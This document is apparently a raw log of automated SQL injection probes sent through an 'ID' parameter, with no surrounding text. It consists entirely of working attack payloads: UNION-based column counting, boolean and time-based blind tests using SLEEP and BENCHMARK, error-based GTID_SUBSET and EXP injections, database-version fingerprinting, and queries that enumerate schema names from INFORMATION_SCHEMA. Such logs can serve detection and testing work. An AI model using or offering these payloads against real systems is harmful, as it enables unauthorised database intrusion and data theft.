ID:-2418" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-5290" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-5599" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-1575" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-4944" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-7386" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8705" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3515" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3098" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-3814" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-2772" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-8626" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:-6493" UNION ALL SELECT 11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11,11#
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT (CASE WHEN (3209=                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                3209) THEN 1 ELSE 0 END)),0x7162716271),5229)-- QdVw
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT REPEAT(0x34,1024)),0x7162716271),8824)-- XbuM
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT REPEAT(0x30,190)),0x7162716271),6943)-- MwUg
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT (CASE WHEN (VERSION() LIKE 0x254d61726961444225) THEN 1 ELSE 0 END)),0x7162716271),1401)-- uGHj
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT (CASE WHEN (VERSION() LIKE 0x255469444225) THEN 1 ELSE 0 END)),0x7162716271),6907)-- KjNI
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x256472697a7a6c6525) THEN 1 ELSE 0 END)),0x7162716271),9311)-- HyYM
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT (CASE WHEN (@@VERSION_COMMENT LIKE 0x25506572636f6e6125) THEN 1 ELSE 0 END)),0x7162716271),6706)-- psZz
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT (CASE WHEN (AURORA_VERSION() LIKE 0x25) THEN 1 ELSE 0 END)),0x7162716271),5661)-- Isjb
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x7162716271),2471)-- XMRq
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7162716271),2956)-- blEs
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x7162716271),3703)-- Vlrj
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x7162716271),2806)-- NcKw
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x7162716271),7204)-- oeuK
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x7162716271),6337)-- dWTi
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x7162716271),8987)-- qySM
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 6,1),0x7162716271),1664)-- sxRW
ID:1" AND GTID_SUBSET(CONCAT(0x717a717171,(SELECT MID((IFNULL(CAST(schema_name AS NCHAR),0x20)),1,190) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 7,1),0x7162716271),7004)-- bGIR
ID:1
ID:9
ID:10
ID:1
ID:1
ID:1
ID:5031
ID:1(',..("...
ID:1'NolANu<'">bGjGWz
ID:1) AND 2499=7169 AND (6846=6846
ID:1) AND 1601=1601 AND (8093=8093
ID:1 AND 6458=1454
ID:1 AND 1601=1601
ID:1 AND 2955=9602-- mFqW
ID:1 AND 1601=1601-- uaTv
ID:1') AND 8948=6865 AND ('EWIw'='EWIw
ID:1') AND 1601=1601 AND ('okFs'='okFs
ID:1' AND 9898=3074 AND 'QLbL'='QLbL
ID:1' AND 1601=1601 AND 'Lryz'='Lryz
ID:(SELECT (CASE WHEN (2273=3548) THEN 1 ELSE (SELECT 3548 UNION SELECT 9701) END))
ID:(SELECT (CASE WHEN (8722=8722) THEN 1 ELSE (SELECT 6479 UNION SELECT 6447) END))
ID:(SELECT CONCAT(CONCAT(0x7170787871,(CASE WHEN (9698=9698) THEN 0x31 ELSE 0x30 END)),0x7170766271))
ID:1) AND 2446=7731#
ID:1) AND 7901=7901#
ID:1)) AND 4358=6166#
ID:1)) AND 7901=7901#
ID:1))) AND 7779=2340#
ID:1))) AND 7901=7901#
ID:1 AND 7920=1888#
ID:1 AND 7901=7901#
ID:1)) AS trBD WHERE 1436=1436 AND 1309=1052#
ID:1)) AS fYcR WHERE 6747=6747 AND 7901=7901#
ID:1) AS LmxK WHERE 3853=3853 AND 3295=3616#
ID:1) AS FLiA WHERE 8768=8768 AND 7901=7901#
ID:1` WHERE 9654=9654 AND 1505=7653#
ID:1` WHERE 6249=6249 AND 7901=7901#
ID:1`) WHERE 3869=3869 AND 9200=1395#
ID:1`) WHERE 2669=2669 AND 7901=7901#
ID:1') AND 4731=1863#
ID:1') AND 7901=7901#
ID:1' AND 3474=4376#
ID:1' AND 7901=7901#
ID:1" AND 8178=6347#
ID:1" AND 7901=7901#
ID:1" AND 3359=8842#
ID:1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170787871,(SELECT (ELT(6786=6786,1))),0x7170766271,0x78))s), 8446744073709551610, 8446744073709551610)))-- ANdt
ID:1" OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170787871,(SELECT (ELT(4227=4227,1))),0x7170766271,0x78))s), 8446744073709551610, 8446744073709551610)))-- xzAS
ID:1" AND EXP(~(SELECT * FROM (SELECT CONCAT(0x7170787871,(SELECT (ELT(6792=6792,1))),0x7170766271,0x78))x))-- MHHq
ID:1" OR EXP(~(SELECT * FROM (SELECT CONCAT(0x7170787871,(SELECT (ELT(9350=9350,1))),0x7170766271,0x78))x))-- tmlR
ID:1" AND GTID_SUBSET(CONCAT(0x7170787871,(SELECT (ELT(7840=7840,1))),0x7170766271),7840)-- pPQn
ID:(SELECT CONCAT(0x7170787871,(ELT(4711=4711,1)),0x7170766271))
ID:1";SELECT SLEEP(5)#
ID:1";SELECT SLEEP(5)-- iVbG
ID:1";(SELECT * FROM (SELECT(SLEEP(5)))hWDs)#
ID:1";(SELECT * FROM (SELECT(SLEEP(5)))nzSV)-- TBxZ
ID:1";SELECT BENCHMARK(5000000,MD5(0x616b6b72))#
ID:1";SELECT BENCHMARK(5000000,MD5(0x4e475a4f))-- NAhI
ID:1" AND (SELECT 9509 FROM (SELECT(SLEEP(5)))SthR)-- MCvD
ID:1" AND (SELECT 9509 FROM (SELECT(SLEEP(0)))SthR)-- MCvD
ID:1" AND (SELECT 9509 FROM (SELECT(SLEEP(5)))SthR)-- MCvD
ID:1" ORDER BY 1#
ID:1" ORDER BY 7560#
ID:1" ORDER BY 10#
ID:1" ORDER BY 6#
ID:1" ORDER BY 4#
ID:1" ORDER BY 3#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x47626c7a596f6e474e6a7a6d6a496f707355614166594f4c704f464d616e61744b4a726f76517961,0x7170766271)#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x6771694f675a7a777a7759616d58495a4a6c64735a5a514867556658416a456456455150496f6f42,0x7170766271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x48696746707a63494d73626e6b5348624b42446d437545756d575261794f6957414b68716f454868,0x7170766271),NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x6d7a4265524f456d414f,0x7170766271)#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x6c6c764f584f6c634a46,0x7170766271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x5775747a71696c636d70,0x7170766271),NULL#
ID:-3765" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x62686779726949584f58576c4b71497177534749585a7468426a6c69486e6a4b537167494e444876,0x7170766271)#
ID:-5935" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x4e6d5063465a6f7a6b4a426b4b6f6c6d49754757467568446d6d4165684a6c7863646d4746724a75,0x7170766271),NULL#
ID:-3848" UNION ALL SELECT CONCAT(0x7170787871,0x6d5141495269635a657562774c544b6d6a4f4b7168576c496f5276506d5349715773787564567152,0x7170766271),NULL,NULL#
ID:-1443" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x734d6e69446b74416344,0x7170766271)#
ID:-6763" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x784e526b4c6377554148,0x7170766271),NULL#
ID:-8628" UNION ALL SELECT CONCAT(0x7170787871,0x56676257575744756757,0x7170766271),NULL,NULL#
ID:1" UNION ALL SELECT 16,CONCAT(0x7170787871,0x58686c614f59556a61797176677a6e506b504d716e6956726465525569714c634b6a744b574c6270,0x7170766271),16#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x6e667a53764c546b477a596b776e467475666a6c4577794677465943496271764479566b5543546a,0x7170766271),16,16#
ID:1" UNION ALL SELECT 16,16,CONCAT(0x7170787871,0x584b736c756b474853466f645865566d7352546662455569494c7a566d6c524c5a5656787a72434d,0x7170766271)#
ID:1" UNION ALL SELECT 16,CONCAT(0x7170787871,0x79714f6e676772486962,0x7170766271),16#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x46617874455a4f597345,0x7170766271),16,16#
ID:1" UNION ALL SELECT 16,16,CONCAT(0x7170787871,0x6358476c727164526155,0x7170766271)#
ID:-4272" UNION ALL SELECT 16,16,CONCAT(0x7170787871,0x62656e416176714b6558675a497a4d7867476c65735149727a777947714753414e66634843416161,0x7170766271)#
ID:-6748" UNION ALL SELECT 16,CONCAT(0x7170787871,0x4d454a7876706469727a644b5a7a4c65656e705649716d6e6467417a61694779776c5165416c5853,0x7170766271),16#
ID:-4179" UNION ALL SELECT CONCAT(0x7170787871,0x437a4d534d586a624c64417856497862654173456b7549704e7448595151655a52574b4874777a75,0x7170766271),16,16#
ID:-2364" UNION ALL SELECT 16,16,CONCAT(0x7170787871,0x6a766a6654566745716c,0x7170766271)#
ID:-5303" UNION ALL SELECT 16,CONCAT(0x7170787871,0x68577853544f52425772,0x7170766271),16#
ID:-6009" UNION ALL SELECT CONCAT(0x7170787871,0x5a49786d6a5870434a4f,0x7170766271),16,16#
ID:1" UNION ALL SELECT NULL#
ID:1" UNION ALL SELECT NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
ID:1" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x4a7872484f475569694c73796d4e61454e436e5a4d6564504273684a69747a676e646b6c55487255,0x7170766271),NULL#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x4e6d46487461726a536e546f78676852475078745379557573506a556b705376466941716555476b,0x7170766271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x58685564554f43727646714f436a4b7a53475a596473565a6141774c4764586d53597874626e5573,0x7170766271)#
ID:1" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x546f71456d57544b496d,0x7170766271),NULL#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x524b6a50797757777066,0x7170766271),NULL,NULL#
ID:1" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x4f7a435943736e4c6a4d,0x7170766271)#
ID:-6356" UNION ALL SELECT CONCAT(0x7170787871,0x626f53714973684756626573637764507156755443736c4c746a7851574b78734c456f5864525142,0x7170766271),NULL,NULL#
ID:-7031" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x694c5279664149446b567459636f684343614258444d55456257426c486a684c64574f7976425a75,0x7170766271)#
ID:-5330" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x7a6e4f714c784a7a6e4a4b4b68724853614d7174496c54596b63586752726f6c7a6a62504a754d4f,0x7170766271),NULL#
ID:-2036" UNION ALL SELECT CONCAT(0x7170787871,0x6c54526663524e444d62,0x7170766271),NULL,NULL#
ID:-2334" UNION ALL SELECT NULL,NULL,CONCAT(0x7170787871,0x66756368646b48414b7a,0x7170766271)#
ID:-4592" UNION ALL SELECT NULL,CONCAT(0x7170787871,0x74626579634c5169794e,0x7170766271),NULL#
ID:1" UNION ALL SELECT 92,CONCAT(0x7170787871,0x714c644b734c507843694944664745625967615a59484d50756c545972554b5a4441674543685559,0x7170766271),92#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x59574b735a66424e74676b62715148696a6b6c736b574a634c6e4f6773494f74757a58645173706f,0x7170766271),92,92#
ID:1" UNION ALL SELECT 92,92,CONCAT(0x7170787871,0x45584c68776e6a4a477275524964514d686e514e497a5863667844446579514c66714e4672635942,0x7170766271)#
ID:1" UNION ALL SELECT 92,CONCAT(0x7170787871,0x5167717a5a446d566241,0x7170766271),92#
ID:1" UNION ALL SELECT CONCAT(0x7170787871,0x706f6a75597559755246,0x7170766271),92,92#
ID:1" UNION ALL SELECT 92,92,CONCAT(0x7170787871,0x7a6d785957524c767646,0x7170766271)#
ID:-7528" UNION ALL SELECT 92,CONCAT(0x7170787871,0x685053436446564c54566e79427a5a504957666f636551666f65424665786a6d504c635462615270,0x7170766271),92#
ID:-9373" UNION ALL SELECT CONCAT(0x7170787871,0x47417171745252425a6e474968775959434c6c50636c6c5779667a6f616e6272697a6d6f56584f46,0x7170766271),92,92#
ID:-5473" UNION ALL SELECT 92,92,CONCAT(0x7170787871,0x6c6c47444e6a6d7178455569564f4a63677659785366654c7a71735a49614d41645157636d505255,0x7170766271)#
ID:-5155" UNION ALL SELECT 92,CONCAT(0x7170787871,0x716479474c4645676d77,0x7170766271),92#
ID:-4244" UNION ALL SELECT CONCAT(0x7170787871,0x504661674f5870706f64,0x7170766271),92,92#
ID:-9257" UNION ALL SELECT 92,92,CONCAT(0x7170787871,0x586e6c635a6750464d62,0x7170766271)#
ID:-6162" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9248" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8198" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9591" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1982" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-5156" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3234" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8257" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3312" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6107" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-7674" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3390" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4241" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9139" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1436" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1492" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9037" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6334" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-4093" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9435" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9907" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1154" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9192" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1965" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6566" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-2448" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9461" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1149" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8991" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-2697" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-5622" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-9616" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-5007" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-8722" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-7397" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6233" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-1904" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-7664" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-3372" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
ID:-6905" UNION ALL SELECT 92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92,92#
